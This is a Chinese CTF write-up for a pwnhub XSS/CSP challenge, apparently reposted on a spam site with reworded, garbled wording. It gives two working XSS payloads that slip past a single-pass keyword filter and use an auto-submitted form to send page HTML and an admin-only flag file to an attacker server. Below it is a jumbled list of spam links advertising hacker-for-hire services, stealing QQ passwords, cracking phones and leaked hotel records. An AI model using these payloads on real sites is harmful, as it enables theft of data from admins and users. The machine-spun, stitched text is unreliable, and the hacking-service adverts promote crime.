pwnhub -- 肯定防护 writeup
周末做了一道关于我来说很蛋疼的标题...可是看了各位师傅的writeup就觉得自己的思路太窄了....
标题地址:https://pwnhub.cn/gamedetail?id=13
注册之后有个留言板,有CSP(不允许对外发送恳求),通过测验只过滤一次某些单次,如:on,oonn就能过。
用表单来绕过csp回来页面到我的服务器上,看到提示
poc:
<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')">
转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...):
拜访http://52.80.63.91/adminshigesha233e3333/ 提示flag.php
拜访flag.php 提示只要admin能看....
测验盲打admin回来flag.php的内容.
poc:
<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')})">
提示:nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...
http://52.80.63.91/adminshigesha233e3333/
PS:在这里卡了一天多,在各种测验加header拜访,get拜访,post拜访,各种蛋疼,测到深夜的时分标题后端挂了...
检查源码:
[1] [2] 黑客接单网
相关文章
黑客接单交流群_需找黑客师傅
有DEFINE_PROTO_FUZZER(const test::common::http::HeaderMapImplFuzzTestCase& input) { ...2019年,咱们猜测...
怎么破解别人手机指纹,解放军美女找黑客小伙,如何找黑客破解qq密码软件
of Compromise,攻陷指标)咱们将做含糊处理。 一切IOC现已整合到东巽的铁穹产品和东巽要挟情报中心,您可拜访以下网址进行查询:https://ti.dongxuntech.com...
淘宝上怎样才能找到黑客接单服务_找黑客盗取别人qq密码
网页挖矿进犯那么,我这儿收拾了其他的几种电话号码走漏办法:要回答这个问题并不简单,咱们每个人都只能看到其间的一个部分,而且或许永久无法实在了解某些进犯的动机或其背面的展开。 尽管如此,在进犯发作之后,...
qq黑客基地,外国黑客木进去代码世界找漏洞电影,黑客怎么找漏洞赚钱
Zhu在10月底向谷歌安全团队陈述了这个缝隙,可是这个团队不认可她的缝隙陈述,回应说这个缝隙并不是安全问题。 文件办理:检查、修改、重命名、删去、上传、下载、紧缩…运用方法:那说到底咱们为什么做应急呼...
开房数据库-接单网
支撑咱们得到的榜首个结论是,进犯者现在十分清楚安全职业运用哪些技能来对进犯进行溯源,因而他们也乱用这些信息,来捉弄安全研究人员。 另一个需求考虑的要素是,进犯的首要方针或许纷歧定是盗取信息或进行损坏,...
网络赌博输了好后悔,钱能要回来吗
.text:0000000000466B19 mov , esi本月Apache被公布了一个提权的漏洞,并且前天在GitHub上公布出了利用脚本,这几天我负责漏洞应急这个漏洞。 Spring官方最新版...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!